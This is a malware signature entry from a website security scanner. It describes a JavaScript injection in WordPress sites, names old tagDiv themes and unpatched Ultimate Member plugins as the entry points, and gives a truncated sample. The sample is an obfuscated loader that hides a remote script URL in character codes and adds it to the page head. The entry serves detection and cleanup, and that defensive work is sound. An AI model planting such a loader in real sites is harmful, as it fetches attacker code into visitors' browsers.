SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.injection.41

malware.injection.41

Injection of an obfuscated script from hxxps://cdn.allyouwant[.]online/main.js?...

Typical sample:

var po = document.createElement('​script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47,...skipped...63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); 
var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].​src == po.src) { need_t = false;}else{} } if(need_t == true){document.​head.appendChild(​po);}

This script can be injected either into JavaScript files (usually with jquery in their names) or into WordPress database.

Affecting:
WordPress.

The attack mainly exploits vulnerabilities in old tagDiv themes and in unpatched Ultimate Member plugin (older than v2.0.22)

For more information and cleanup instructions read our blog post.